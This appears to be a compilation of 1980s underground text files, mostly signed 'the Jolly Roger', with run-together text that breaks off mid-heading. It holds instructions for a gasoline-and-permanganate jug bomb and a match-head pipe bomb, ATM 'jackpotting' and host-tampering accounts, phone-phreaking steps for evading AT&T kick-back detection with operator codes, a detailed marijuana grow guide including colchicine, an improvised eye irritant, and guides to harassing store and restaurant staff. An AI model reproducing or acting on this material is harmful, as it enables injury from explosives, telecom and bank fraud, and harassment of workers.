JACKPOTTING was done rather successfully a while back in (you guessed it)New York. What the culprits did was:Sever (actually cross over) the line between the ATM and thehost. insert a microcomputer between the ATM and the host. inserta fradulent card into the ATM. (card=cash card, not hardware)What the ATM did was: send a signal to the host, saying "Hey! Can Igive this guy money, or is he broke, or is his card invalid?"What the microcomputer did was: intercept the signal from the host,
discard it, send "there's no one using the ATM" signal.What the host did was: get the "no one using" signal, send back "okay,then for God's sake don't spit out any money!" signal to ATM.What the microcomputer did was:intercept signal (again), throw it away (again), send "Wow! Thatguy is like TOO rich! Give him as much money as he wants. Infact, he's so loaded, give him ALL the cash we have! He isreally a valued customer." signal.What the ATM did:what else? Obediently dispense cash till the cows came home (orvery nearly so).What the crooks got:well in excess of $120,000 (for one weekend's work), and severalyears when they were caught.This story was used at a CRYPTOGRAPHY conference I attended a whileago to demonstrate the need for better information security. Thelines between ATM's & their hosts are usually 'weak' in the sense thatthe information transmitted on them is generally not encrypted in anyway. One of the ways that JACKPOTTING can be defeated is to encryptthe information passing between the ATM and the host. As long as thekey cannot be determined from the ciphertext, the transmission (andhence the transaction) is secure.A more believable, technically accurate story might concern a personwho uses a computer between the ATM and the host to determine the keybefore actually fooling the host. As everyone knows, people findcryptanalysis a very exciting and engrossing subject...don't they?(Hee-Hee)
_____ ______ -<<- -<<- ATM micro Host___->>- ->>-____
The B of A ATM's are connected through dedicated lines to a hostcomputer as the Bishop said. However, for maintenance purposes, thereis at least one separate dial-up line also going to that same hostcomputer. This guy basically bs'ed his way over the phone till hefound someone stupid enough to give him th number. After finding that,he had has Apple hack at the code. Simple.Step 2: He had a friend go to an ATM with any B of A ATM card. Hestayed at home with the Apple connected to the host. When his friendinserted the card, the host displayed it. The guy with the Applemodified the status & number of the card directly in the host'smemory. He turned the card into a security card, used for testingpurposes. At that point, the ATM did whatever it's operator told it todo.The next day, he went into the bank with the $2000 he received,talked to the manager and told him every detail of what he'd done. Themanager gave him his business card and told him that he had a jobwaiting for him when he got out of school.Now, B of A has been warned, they might have changed the system. Onthe other hand, it'd be awful expensive to do that over the wholecountry when only a handful of people have the resources and even lesshave the intelligence to duplicate the feat. Who knows?Jug Bomb by the Jolly Roger
Take a glass jug, and put 3 to 4 drops of gasoline into it. Then putthe cap on, and swish the gas around so the inner surface of the jug
is coated. Then add a few drops of potassium permanganate solutioninto it and cap it. To blow it up, either throw it at something, orroll it at something. ------------Jolly Roger
Fun at K-Mart by the Jolly Roger
Well, first off, one must realise the importance of K-Marts insociety today. First off, K-Marts provide things cheaper to those whocan't afford to shop at higher quality stores. Although, all I eversee in there is minorities and Senior Citizens, and the poor people inour city. Personally, I wouldn't be caught dead in there. But, once,I did.You see, once, after The Moon Roach and Havoc Chaos(Dear friends ofmine) and I were exploring such fun things as rooftops, we came alonga K-Mart. Amused, and cold for that matter, we wandered in. TheTension mounts.As we walked up to the entrance, we were nearly attacked by YouthGroups selling cheap cookies, and wheelchair sticken people sellingAmerican Flags. After laughing at these people, we entered. This iswhere the real fun begins...First, we wandered around the store, and turned on all the bluelights we could find. That really distracts and confuses theattendents...Fun to do...The first neat thing, is to go to the section of the store wherethey sell computers. Darkness engulf the earth the day they find AppleComputers being sold there. Instead, lesser computers like thelaughable C-64 can be found there...Turn it on, and make surenobody's looking...Then, once in Basic, type...
]10 PRINT "Fuck the world! Anarchy Rules!" (or something to that effect.)]20 GOTO 10 and walk away.
Also, set the sample radios in the store to a santanic rock station,and turn the radio off. Then, set the alarm for two minutes ahead ofthe time displayed there. Turn the volume up all the way, and walkaway. After about two minutes, you will see the clerk feebly attemptto turn the radio down or off. It's really neat to set ten or moreradios to different stations, and walk away.One of my favorite things to do, is to get onto the intercom systemof the store. Easier typed then done. First, check out the gardendepartment. You say there's no attendent there? Good. Sneakcarefully over to the phone behind the cheap counter there, and pickit up. Dial the number corrisponding to the item that says 'PAGE'...And talk. You will note that your voice will echo all over the bowelsof K-Mart.I would suggest announcing something on the lines of: "Anarchyrules!!" ---------------Jolly Roger
Mace Substitute by the Jolly Roger
3 PARTS: Alcohol1/2 PARTS: Iodine1/2 PARTS: SaltOr:3 PARTS: Alcohol
1 PARTS: Iodized Salt (Mortons)
It's not actual mace, but it does a damn good job on the eyes...
--------------Jolly Roger
How to grow Marijuana courtesy of the Jolly Roger
MARIJUANAMarijuana is a deciduous plant which grows from seeds. The fibrous sectionof the plant was (has been replaced by synthetics) used to make rope.The flowering tops, leaves, seeds, and resin of the plant isused by just about everyone to get HIGH.Normally, the vegetable parts of the plant are smoked to produce this"high," but thay can also be eaten. The axtive ingredient in marijuanaresin is THC (tetahydrocannabinol). Marijuana contains from 1 - 4 percent THC (4 per cent must be considered GOOD dope).Marijuana grows wild in many parts of the world, and is cultivated inMexice, Vietnam, Africa, Nepal, India, South America, etc.,etc. Themarijuana sold in the United States comes primarily from, yes, theUniited States.It is estimated that at least 50 per cent of the grass on the streetsin America is homegrown. The next largest bunch comes actoss theborders from Mexico, with smaller amounts filtering in from Panama,occasionally South America, and occasinally, Africa.Hashish is the pure resin of the marijuana plant, which is scraped fromthe flowering tops of the plant and lumped together. Ganja is theground-up tops of the finest plants. (It is also the name given to anysort of marijuana in Jamaica.)Marijuana will deteriorate in about two years if exposed to light,air or heat. It should always be stored in cool places.Grass prices in the United States are a direct reflection of the lawsof supply and demand (and you thought that high school economicswould never be useful). A series of large border busts, a short growingseason, a bad crop, any number of things can drive the price of marijuanaup. Demand still seems to be on the increase in the U.S., so prices seldomfall below last year's level.Each year a small seasonal drought occurs, as last year's supply runslow, and next year's crop is not up yet. Prices usually rase about20 - 75 per cent during this time and then fall back to "normal."Unquestionably, a large shortage of grass causes a percentage of smokersto turn to harder drugs instead. For this reason, no grass controlprogram can ever be beneficial or "successful." GROW IT!There is one surefire way of avoiding high prices and the grass DT's:Grow your own. This is not as difficult as some "authorities" on thesubject would make you believe. Marijuana is a weed, and a fairlyvivacious one at that, and it will grow almost in spite of you. OUTDOORSContrary to propular belief, grass grows well in many place on theNorth American continent. It will flourish even if the temperature doesnot raise above 75 degrees.The plants do need a minimum of eight hours of sunlight per day andshould be planted in late April/early May, BUT DEFINITELY, after thelast frost of the year.Growing an outdoor, or "au naturel", crop has been the favored methodover the years, because grass seems to grow better without as muchattention when in its natural habitat.
Of course, an outdoors setting requires special precautions not encoun-tered with an indoors crop; you must be able to avoid detection, both fromlaw enforcement freaks and common freaks, both of whom will take yourweed and probably use it. Of course, one will also arrest you. You mustalso have access to the area to prepare the soil and harvest the crop.There are two schools of thought about starting the seeds. One says youshould start the seedlings for about ten days in an indoor starter box(see the indoor section) and then transplant. The other theory is thatyou should just start them in the correct location. Fewer plants willcome up with this method, but there is no shock of transplant tokill some of the seedlings halfway through.The soil should be preprepared for the little devils by turning itover a couple of times and adding about one cup of hydrated lime persquare yard of soil and a little bit (not too much, now) of good watersoluble nitrogen fertilizer. The soil should now be watered severaltimes and left to sit about one week.The plants should be planted at least three feet apart, getting toogreedy and stacking them too close will result in stunted plants.The plants like some water during their growing season, BUT not toomuch. This is especially true around the roots, as too much water willrot the root system.Grass grows well in corn or hops, and these plants will help providesome camouflage. It does not grow well with rye, spinach, or pepperweed.It is probally a good idea to plant in many small, broken patches, aspeople tend to notice patterns. GENERAL GROWING INFOBoth the male and he female plant produce THC resin, although the maleis not as strong as the female. In a good crop, the male will still beplenty smokable and should not be thrown away under any circumstances.Marijuana can reach a hight of twenty feet (or would you rather wish ona star) and obtain a diameter of 4 1/2 inches. If normal, it has a sexratio of about 1:1, but this can be altered in several ways.The male plant dies in the 12th week of growing, the female will liveanother 3 - 5 weeks to produce her younguns. Females can weigh twice asmuch as males when they are mature.Marijuana soil should compact when you squeeze it, but should also breakapart with a small pressure and absorb water well. A nice testfor either indoor or outdoor growing is to add a bunch of worms to thesoil, if they live and hang aroung, it is good soil, but if they don't,well, change it. Worms also help keep the soil loose enough for theplants to grow well. SEEDSTo get good grass, you should start with the right seeds. A nice startingpoint is to save the seeds form the best batch you have consumed. Theseeds should be virile, that is, they should not be grey and shiriveledup, but green, meaty, and healthy appearing. A nice test is to drop theseeds on a hot frying pan. If they "CRACK," they are probably good forplanting purposes.The seeds should be soaked in distilled water overnight before planting.BE SURE to plant in the ground with the pointy end UP. Plant about 1/2"deep. Healthy seeds will sprout in about five days. SPROUTINGThe best all around sprouting method is probably to make a sprouting box(as sold in nurseries) with a slated bottom or use paper cups with holespunched in the bottoms. The sprouting soil should be a mixture of humus,soil, and five sand with a bit of organic fertilizer and water mixedin about one week before planting.When ready to transplant, you must be sure and leave a ball of soil
around the roots of each plant. This whole ball is dropped into abaseball-sized hold in the permanent soil.If you are growing/transplanting indoors, you should use a greensafe light (purchased at nurseries) during the transplanting operation.If you are transplanting outdoors, you should time it about twohours befor sunset to avoid damage to the plant. Always wear cottongloves when handling the young plants.After the plants are set in the hole, you should water them. It is alsoa good idea to use a commercial transplant chemical (also purchased atnurseries) to help then overcome the shock. INDOOR GROWINGIndoor growing has many advantages, besides the apparent fact that itis much harder to have your crop "found," you can control the ambientconditions just exactly as you want them and get a guaranteed "good"plant.Plants grown indoors will not appear the same as their outdoor cousins.They will be scrawnier appearing with a weak stems and may even requireyou to tie them to a growing post to remain upright, BUT THEY WILL HAVEAS MUCH OR MORE RESIN!If growing in a room, you should put tar paper on the floors and thenbuy sterilized bags of soil form a nursery. You will need about onecubic foot of soil for eavh plant.The plants will need about 150 ml. of water per plant/per week. Theywill also need fresh air, so the room must be ventilated. (however,the fresh air should contain NO TOBACCO smoke.)At least eight hours of light a day must be provided. As you increasethe light, the plants grow faster and show more females/less males.Sixteen hours of light per day seems to be the best combination, beyondthis makes little or no appreciable difference in the plant quality.Another idea is to interrupt the night cycle with about one hour oflight. This gives you more females.The walls of your growing room should be painted white or covered withaluminum foil to reflect the light.The lights themselves can be either bulbs of fluorescent. Figure about75 watts per plant or one plant per two feet of flouresent tube.The fluorescents are the best, but do not use "cool white" types. Thelight sources should be an average of twenty inches from theplant and NEVER closer than 14 inches. They may be mounted on a rack and moved every few days as the plants grow.The very best light sources are those made by Sylvania and othersespecially for growing plants (such as the "gro lux" types). HARVESTING AND DRYINGThe male plants will be taller and have about five green or yellow sepals,which will split open to fertilize the female plant with pollen.The female plant is shorter and has a small pistillate flower, whichreally doesn't look like a flower at all but rather a small bunch ofleaves in a cluster.If you don't want any seeds, just good dope, you should pick the malesbefore they shed their pollen as the female will use some of her resinto make the seeds.After another three to five weeks, after the males are gone, the femaleswill begin to wither and die (from loneliness?), this is the time to pick.In some nefarious Middle Eastren countries, farmers reportedly put theirbeehives next to fiels of marijuana. The little devils collect the grasspollen for their honey, which is supposed to contain a fair dosageof THC.The honey is then enjoyed by conventional methods or made into ambrosia.If you want seeds - let the males shed his pollen then pick him. Let
the female go another month and pick her.To cure the plants, they must be dried. On large crops, this isaccomplished by constructing a drying box or drying room.You must have a heat source (such as an electric heater) which will makethe box/room each 130 degrees. The box/room must be ventilatedto carry off the water-vapor-laden air and replace it with fresh.A good box can be constructed from an orange crate with fiberglassinsulated walls, vents in the tops, and screen shelves to hold the leaves.There must be a baffle between the leaves and the heat source.A quick cure for smaller amounts is to: cut the plant at the soil leveland wrap it in a cloth so as not to loose any leavs. Take out any seedsby hand and store. Place all the leaves on a cookie sheet or aluminumfoil and put them in the middle sheld of the oven, which is set on "broil."In a few seconds, the leaves will smoke and curl up, stir them around andgive another ten seconds before you take them out. TO INCREASE THE GOOD STUFFThere are several tricks to increase the number of females, or the THCcontent of plants:You can make the plants mature in 36 days if you are in a hurry, by cuttingback on the light to about 14 hours, but the plants will not be as big.You should gradually shorten the light cycle until you reach fourteenhours.You can stop any watering as the plants begin to bake the resin rise tothe flowers. This will increse the resin a bit.You can use a sunlamp on the plants as they begin to develop flower stalks.You can snip off the flower, right at the spot where it joins the plant,and a new flower will form in a couple of weeks.This can be repeated two or three times to get several times more flowersthan usual.If the plants are sprayed with Ethrel early in their growing stage, theywill produce almost all female plants. This usually speeds up the floweringalso, it may happen in as little as two weeks.You can employ a growth changer called colchicine. This is a bit hard toget and expensive. (Should be ordered through a lab of some sort andcosts about $35 a gram.)To use the colchicine, you should prepare your presoaking solution ofdistilled water with about 0.10 per cent colchicine. This will causemany of the seeds to die and not germinate, but the ones that do comeup will be polyploid plants. This is the accepted difference betweensuch strains as "gold" and normal grass, and yours will DEFINITELYbe superweed.The problem here is that colchicine is a posion in larger quanities andmay be poisonous in the first generation of plants. Bill Frake, authorof CONNOISSEUR'S HANDBOOK OF MARIJUANA runs a very complete colchicinetreatment down and warns against smoking the first generation plants(all succeeding generations will also be polyploid) bacause of thispoisonous quality.However, the Medical Index shows colchicine being given in very smallquantities to people for treatment if various ailments. Although thesequantities are small, they would appear to be larger than any you couldrecive form smoaking a seed-treated plant.It would be a good idea to buy a copy of CONNOISSEUR'S, if you are planningto attempt this, and read Mr. Drake's complete instructions.Another still-experimental process to increase the resin it to pinch offthe leaf tips as soon as they appear from the time the plant is in theseedling stage on through its entire life-span. This produces a distorted,wrecked-looking plant which would be very difficuly to recognize asmarijuana. Of course, there is less substance to this plant, but such
wrecked creatures have been known to produve so much resin that itcrystallizes a strong hash all over the surface of the plant - mightbe wise to try it on a plant or two and see what happens. PLANT PROBLEM CHARTAlways check the overall enviromental conditions prior to passingjudgment - soil aroung 7 pH or slightly less - plenty of water, light,fresh air, loose soil, no water standing in pools. SYMPTOM PROBABLY PROBLEM/CURELarger leaves turning yellow - Nitrogen dificiency - addsmaller leaves still green. nitrate of soda or organic fertilizer.Older leaves will curl at edges, Phosphorsus dificiency -turn dark, possibaly with a purple add commercial phosphate.cast.Mature leaves develop a yellowish Magnesium dificiency -cast to least veinal areas. add commercial fertilizer with a magnesium content.Mature leaves turn yellow and then Potassium dificiency -become spotted with edge areas add muriate of potash.turning dark grey.Cracked stems, no healthy support Boron dificiency - addtissue. any plant food containing boron.Small wrinkled leaves with Zinc dificiency - addyelloish vein systems. commercial plant food containing zinc.Young leaves become deformed, Molybedum dificiency -possibaly yellowing. use any plant food with a bit of molydbenum in it. EXTRA SECTION: BAD WEED/GOOD WEEDCan you turn bad weed into good weed? Surprisingly enough, the answerto this oft-asked inquiry is, yes!Like most other things in life, the amount of good you are goingto do relates directly to how much effort you are going to put into it.There are no instant, supermarket products which you can spray on Kansascatnip and have wonderweed, but there are a number of simplified,inexpensive processes (Gee, Mr. Wizard!) thich will enhance mediocregrass somewhat, ant there are a couple of fairly involved processeswhich will do up even almost-parsley weed into something worth writinghome about. EASES1. Place the dope in a container which allows air to enter in a restrictedfashion (such as a can with nail holes punched in its lid) and add abunch of dry ice, and the place the whold shebang in the freezer for afew days. This process will add a certain amount of potency to the product,however, this only works with dry ice, if you use normal, everydayfreezer ice, you will end up with a soggy mess...2. Take a quantity of grass and dampen it, place in a baggie or anothersocially acceptable container, and store it in a dark, dampish placefor a couple of weeks (burying it also seems to work). The grass willdevelop a mold which tastes a bit harsh, a and burns a tiny bit funny,but does increase the potency.3. Expose the grass to the high intensity light of a sunlamp for a fullday or so. Personally, I don't feel that this is worth the effort, butif you just spent $400 of your friend's money for this brick ofsuper-Colombian, right-from-the-President's-personal-stash,and it turns out to be Missouri weed, and you're packing your bags to
leave town before the people arrive for their shares, well, you mightat least try it. Can't hurt.4. Take the undisirable portions of our stash (stems, seeds, weak weed,worms, etc.) and place them in a covered pot, with enough rubbingalchol to cover everything.Now CAREFULLY boil the mixture on an ELECTRIC stove or lab burner. DONOT USE GAS - the alchol is too flammable. After 45 minutes of heat,remove the pot and strain the solids out, SAVING THE ALCOHOL.Now, repeat the process with the same residuals, but fresh alchol.When the second boil is over, remove the solids again, combine the twoquantities of alcohol and reboil until you have a syrupy mixture.Now, this syrupy mixture will contain much of the THC formerly hiddenin the stems and such. One simply takes this syrup the throughlycombines it with the grass that one wishes to improve upon. SPECIAL SECTION ON RELATED SUBJECT MARYGIN:Marygin is an anagram of the words marijuana and gin, as in Eli Whitney.It is a plastic tumbler which acts much like a commercial cottin gin.One takes about one ounce of an harb and breaks it up. This is then placedin the Marygin and the protuding knod is roatated. This action turnsthe internal wheel, which separates the grass from the debris (seeds,stems).It does not pulberize the grass as screens have a habit of doing and iseasily washable.Marygin is available from: P.O. Box 5827 Tuscon, Arizona 85703 $5.00
GRASS Edmund Scientific Company 555 Edscorp Building Barrington, New Jersy 08007 Free Catalog is a wonder of good things for the potential grassgrower. They have an electric thermostat greenhouse for startingplants for a mere $14.95.Soil test kits for PH - $2.40Al test - $9.95Soil thermometer - $2.75Lights which approzimate the true color balance of the sun and areprobably the most beneficial types available: 40 watt, 48 inch - 4 for$15.75.Indoor sun bulb, 75 or 150 watt - $5.75.And, they have a natural growth regualtor for plants (Gibberellin) whichcan change height, speed growth, and maturity, promote blossoming,etc. Each plant reacts differently to treatment with Gibberellin...there'sno fun like experimenting - $2.00 SUGGESTED READINGTHE CONNOISSEUR'S HANDBOOK OF MARIJUANA, Bill DrakeStraight Arrow Publishing - $3.50625 Third StreetSan Francisco, California
FLASHP.O.Box 16098San Fransicso, California 94116Stocks a series of pamphlets on grass, dope manufacture, cooking.Includes the Mary Jane Superweed series.
Match Head Bomb by the Jolly Roger
Simple safety match heads in a pipe, capped at both ends, make adevestating bomb. It is set off with a regular fuse.A plastic Baggie is put into the pipe before the heads go in toprevent detonation by contact with the metal.Cutting enough match heads to fill the pipe can be tedious work forone but an evening's fun for the family if you can drag them away fromthe TV. ----------------Jolly Roger
How To Terrorize McDonalds by the Jolly Roger (Originally an Apple ][ file so excuse the upper case!!!)
NOW, ALTHOUGH Mc DONALDS IS FAMOUS FOR IT'S ADVERTISING AND MAKING THEWHOLE WORLD THINK THAT THE BIG MAC IS THE BEST THING TO COME ALONG SINCESLICED BREAD (BUNS?), EACH LITTLE RESTAURANT IS AS AMATEUR AND SIMPLE ASA NEW-FOUND BUSNESS. NOT ONLY ARE ALL THE EMPLOYEES RATHER INEXPERIENCEDAT WHAT THEY'RE =SUPPOSED= TO DO, BUT THEY WILL JUST LOOSE ALL CONTROL WHENAN EMERGENCY OCCURS....HERE WE GO!!! FIRST, GET A FEW FRIENDS (4 ISGOOD...I'LL GET TO THIS LATER) AND ENTER THE MCDONALDS RESTAURANT, TALKINGLOUDLY AND REAKING OF SOME STRANGE SMELL THAT AUTOMATICALLY MAKES THE OLDCOUPLE SITTING BY THE DOOR LEAVE. IF ONE OF THOSE PIMPLY-FACED GOONS ISWIPING THE FLOOR, THEN TRACK SOME CRAP ALL OVER IT (YOU COULD PRETEND TOSLIP AND BREAK YOUR HEAD, BUT YOU MIGHT ACTUALLY DO SO).NEXT, BEFORE YOU GET THE FOOD, FIND A TABLE. START YELLING AND RELEASINGSOME STRANGE BODY ODOR SO =ANYBODY= WOULD LEAVE THEIR TABLE AND WALK OUTTHE DOOR. SIT 2 FRIENDS THERE, AND GO UP TO THE COUNTER WITH ANOTHER.FIND A PLACE WHERE THE LINE IS SHORT, OR IF THE LINE IS LONG SAY "I ONLYWANNA BUY A COKE" AND YOU GET MOVED UP. NOW, YOU GET TO DO THE =ORDERING=...HEH HEH HEH. SOMEBODY =ALWAYS= MUST WANT A PLAINHAMBURGER WITH ABSOLUTELY NOTHING ON IT (THIS TAKES EXTRA TIME TO MAKE, ANDDRIVES THE LITTLE HAMBURGER-MAKERS INSANE)..ORDER A 9-PACK OF CHICKENMCNUGGETS...NO, A 20 PACK...NO, THREE 6 PACKS...WAIT...GO BACK TO THE TABLEAND ASK WHO WANTS WHAT. YOUR OTHER FRIEND WAITS BY THE COUNTER AND MAKES APASS AT THE FEMALE CLERK. GET BACK TO THE THING AND ORDER THREE 6-PACKS OFCHICKEN ETC....NOW SHE SAYS "WHAT KIND OF SAUCE WOULD YOU LIKE?".OF COURSE,SAY THAT YOU ALL WANT BARBECUE SAUCE ONE OF YOUR FRIENDS WANTS 2 (ONLY IFTHERE ARE ONLY 2 CONTAINERS OF BARBECUE SAUCE LEFT).THEN THEY HAFTA GO INTOTHE STOREROOM AND OPEN UP ANOTHER BOX. FINALLY, THE DRINKS...SOMEBODY WANTSCOKE, SOMEBODY ROOT BEER, AND SOMEBODY DIET COKE. AFTER THESE AREDELIVERED,BRING THEM BACK AND SAY "I DIDN'T ORDER A DIET COKE! I ORDERED A SPRITE!"THIS GETS THEM MAD; BETTER YET, TURN DOWN SOMETHING TERRIBLE THAT NOBODYWANTS TO DRINK, SO THEY HAFTA THROW THE DRINK AWAY; THEY CAN'T SELL IT.AFTER ALL THE FOOD(?) IS HANDED TO YOU, YOU MUST =NEVER= HAVE ENOUGH MONEYTO PAY. THE CLERK WILL BE SO ANGRY AND CONFUSED THAT SHE'LL LET YA GETAWAY WITH IT (ANOTHER INFLUENCE ON HER IS YOUR FRIEND ASKING HER "IF YOULET US GO I'LL GO OUT WITH YOU" AND GIVING HER A FAKE FONE NUMBER).NOW, BACK TO YOUR TABLE. BUT FIRST, SOMEBODY LIKES KETCHUP AND MUSTARD.AND PLENTY (TOO MUCH) OF NAPKINS. OH, AND SOMEBODY LIKES FORKS AND KNIVES,SO ALWAYS END UP BREAKING THE ONES YOU PICK OUTTA THE BOX. HAVE YOURFRIENDS YELL OUT,"YAY!!!!! WE HAVE MUNCHIES!!" AS LOUD AS THEY CAN.THAT'LL WORRY THE ENTIRE RESTAURANT. PROCEED TO SIT DOWN. SO, YOU ARESITTING IN THE SMOKING SECTION (BY ACCIDENT) EH? WELL, WHILE ONE OF THETOBACCO-BREATHERS ISN'T LOOKING, PUT A SIGN FROM THE OTHER SIDE OF THEROOM SAYING "DO NOT SMOKE HERE" AND HE'LL HAFTA MOVE...THEN HE GOES INTO
THE REAL NON-SMOKING SECTION, AND GETS YELLED AT. HE THEN THINKS THATNO SMOKING IS ALLOWED IN THE RESTAURANT, SO HE EATS OUTSIDE (IN THE POUR-ING RAIN) AFTER YOUR MEAL IS FINISHED (AND QUITE A FEW SPLATTERED-OPENEDKETCHUP PACKETS ARE ALL OVER YER TABLE), TRY TO LEAVE. BUT OOPS! SOMEBODYHAS TO DO HIS DUTY IN THE MEN'S ROOM. AS HE GOES THERE, HE STICKS ANUNEATED HAMBURGGR (WOULD YOU DARE TO EAT ONE OF THEIR HAMBURGERS?)INSIDE THE TOILET, FLUSHES IT A WHILE,UNTIL IT RUNS ALL OVER THE BATHROOM.OOPS! SEND A PIMPLY-FACED TEENAGER TO CLEAN IT UP. (HE WON'T KNOW THATBROWN THING IS A HAMBURGER, AND HE'LL GET SICK. WHEEE!)AS YOU LEAVE THE RESTCURANT, LOOKING BACK AT YOUR UNCLEANED TABLE, SOMEBODYMUST REMEMBER THAT THEY LEFT THEIR CHOCOLATE SHAKE THERE! THE ONE THAT'SALMOST FULL!!!! HE TAKES IT THEN SAYS "THIS TASTES LIKE CRAP!", THEN HETAKES OFF THE LID AND THROWS IT INTO THE GARBAGE CAN...OOPS! HE MISSED,AND NOW THE SAME POOR SOUL WHO'S CLEANING UP THE BATHROOM NOW HASTA CLEANUP CHOCOLATE SHAKE. THEN LEAVE THE JOINT, REVERSING THE "YES, WE'RE OPEN"SIGN (AS A REMINDER OF YER VISIT THERE YOU HAVE IT! YOU HAVE JUST PUTALL OF MCDONALDS INTO COMPLETE MAYHEM. AND SINCE THERE IS NO PENALTY FORLITTERING IN A RESTAURANT, BUGGING PEOPLE IN A PUBLIC EATERY (ORTHROW-UPERY, IN THIS CASE) YOU GET OFF SCOT-FREE. WASN'T THAT FUN?
--------------Jolly Roger
"Mentor's Last Words" courtesy of the Jolly Roger
The following file is being reprinted in honor and sympathy for the manyphreaks and hackers that have been busted recently by the Secret Service.- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \/\The Conscience of a Hacker/\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Another one got caught today, it's all over the papers. "TeenagerArrested in Computer Crime Scandal", "Hacker Arrested after BankTampering"... Damn kids. They're all alike. But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind theeyes of the hacker? Did you ever wonder what made him tick, what forcesshaped him, what may have molded him? I am a hacker, enter my world...Mine is a world that begins with school... I'm smarter than most of theother kids, this crap they teach us bores me... Damn underachiever.They're all alike. I'm in junior high or high school. I've listened toteachers explain for the fifteenth time how to reduce a fraction.I understand it. "No, Ms. Smith, I didn't show my work. I did it inmy head..." Damn kid. Probably copied it. They're all alike.I made a discovery today. I found a computer. Wait a second, this iscool. It does what I want it to. If it makes a mistake, it's because Iscrewed it up. Not because it doesn't like me... Or feels threatened byme.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't behere... Damn kid. All he does is play games. They're all alike. And thenit happened... a door opened to a world... rushing through the phone linelike heroin through an addict's veins, an electronic pulse is sent out,a refuge from the day-to-day incompetencies is sought... a board is found."This is it... this is where I belong..." I know everyone here... evenif I've never met them, never talked to them, may never hear from themagain... I know you all... Damn kid. Tying up the phone line again.They're all alike... You bet your ass we're all alike... we've beenspoon-fed baby food at school when we hungered for steak... the bits ofmeat that you did let slip through were pre-chewed and tasteless.We've been dominated by sadists, or ignored by the apathetic. The fewthat had something to teach found us willing pupils, but those few arelike drops of water in the desert.
This is our world now... the world of the electron and the switch, thebeauty of the baud. We make use of a service already existing withoutpaying for what could be dirt-cheap if it wasn't run by profiteeringgluttons, and you call us criminals. We explore... and you call uscriminals. We seek after knowledge... and you call us criminals. Weexist without skin color, without nationality, without religious bias...and you call us criminals. You build atomic bombs, you wage wars, youmurder, cheat, and lie to us and try to make us believe it's for ourown good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime isthat of judging people by what they say and think, not what they look like.My crime is that of outsmarting you, something that you will neverforgive me for. I am a hacker, and this is my manifesto. You may stopthis individual,but you can't stop us all... after all, we're all alike. +++The Mentor+++[May the members of the phreak community never forget his words -JR]
The Myth of the 2600hz Detector courtesy of the Jolly Roger (Imported from the Apple ][ so forgive the upper case!!)
JUST ABOUT EVERYONE I TALK TO THESE DAYS ABOUT ESS SEEMS TO BE SCAREDWITLESS ABOUT THE 2600HZ DETECTOR. I DON'T KNOW WHO THOUGHT THIS ONE UP,BUT IT SIMPLY DOES NOT EXIST. SO MANY OF YOU PEOPLE WHINE ABOUT THIS SO-CALLED PHREAK CATCHING DEVICE FOR NO REASON.SOMEONE WITH AT&T SAID THEY HAD IT TO CATCH PHREAKERS. THIS WAS JUST TOSCARE THE BLUE-BOXERS ENOUGH TO MAKE THEM QUIT BOXING FREE CALLS.I'M NOT SAYING ESS IS WITHOUT ITS HANG-UPS, EITHER. ONE THING THAT ESS CANDETECT READILY IS THE KICK-BACK THAT THE TRUNK CIRCUITRY SENDS BACK TO THEESS MACHINE WHEN YOUR LITTLE 2600HZ TONE RESETS THE TOLL TRUNK. AFTER ANESS DETECTS A KICKBACK IT TURNS AN M-F DETECTOR ON AND RECORDES ANY M-FTONES X-MITTED.
--------------------------------------- DEFEATING THE KICK-BACK DETECTOR ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
AS MENTIONED IN MY PREVIOUS NOTE, KICK-BACK DETECTION CAN BE A SERIOUSNUISANCE TO ANYONE INTERESTED IN GAINING CONTROL OF A TRUNK LINE.THE EASIEST WAY TO BY-PASS THIS DETECTION CIRCUITRY IS NOT REALLYBY-PASSING IT AT ALL, IT IS JUST LETTING THE KICK-BACK GET DETECTED ONSOME OTHER LINE. THIS OTHER LINE IS YOUR LOCAL MCI, SPRINT, OR OTHER LONGDISTANCE CARRIER (EXCEPT AT&T). THE ONLY CATCH IS THAT THE SERVICEYOU USE MUST NOT DISCONNECT THE LINE WHEN YOU HIT THE 2600HZ TONE.THIS IS HOW YOU DO IT: CALL UP YOUR LOCAL EXTENDER, PUT IN THE CODE,AND DIAL A NUMBER IN THE 601 AREA CODE AND THE 644 EXCHANGE. LOTS OF OTHEREXCHANGES WORK ACROSS THE COUNTRY, I'M SURE, BUT THIS IS THE ONLY ONETHAT I HAVE FOUND SO FAR. ANYWAY, WHEN IT STARTS RINGING, SIMPLY HIT2600HZ AND YOU'LL HEAR THE KICK-BACK, (KA-CHIRP, OR WHATEVER). THEN YOU AREREADY TO DIAL WHOEVER YOU WANT (CONFERENCES, INWARD, ROUTE AND RATE,OVERSEAS, ETC.) FROM THE TRUNK LINE IN OPERATOR TONES! SINCE BLOWING2600HZ DOESN'T MAKE YOU YOU A PHREAKER UNTIL THE TOLL EQUIPMENT RESETSTHE LINE, KICKBACK DETECTION IS THE METHOD AT&T CHOOSES (FOR NOW)THIS INFORMATION COMES AS A RESULT OF MY EXPERIMENTS & EXPERIENCE ANDHAS BEEN VERIFIED BY LOCAL AT&T EMPLOYEES I HAVE AS ACQUAINTANCES.THEY COULD ONLY SAY THAT THIS IS TRUE FOR MY AREA, BUT WERE PRETTY SURETHAT THE SAME IDEA IS IMPLEMENTED ACROSS THE COUNTRY.
=======================================
‡NOW THAT YOU KNOW HOW TO ACCESS A TRUNK LINE OR AS OPERATORS SAY A LOOP, IWILL TELL YOU THE MANY THINGS YOU CAN DO WITH IT.HERE IS A LIST OF AT&T SERVICES ACCESSIBLE TO YOU BY USING A BLUE BOX.
A/C+101 TOLL SWITCHINGA/C+121 INWARD OPERATORA/C+131 INFORMATIONA/C+141 ROUTE & RATE OP.A/C+11501 MOBILE OPERATORA/C+11521 MOBILE OPERATOR
STARTING CONFERANCES:---------------------
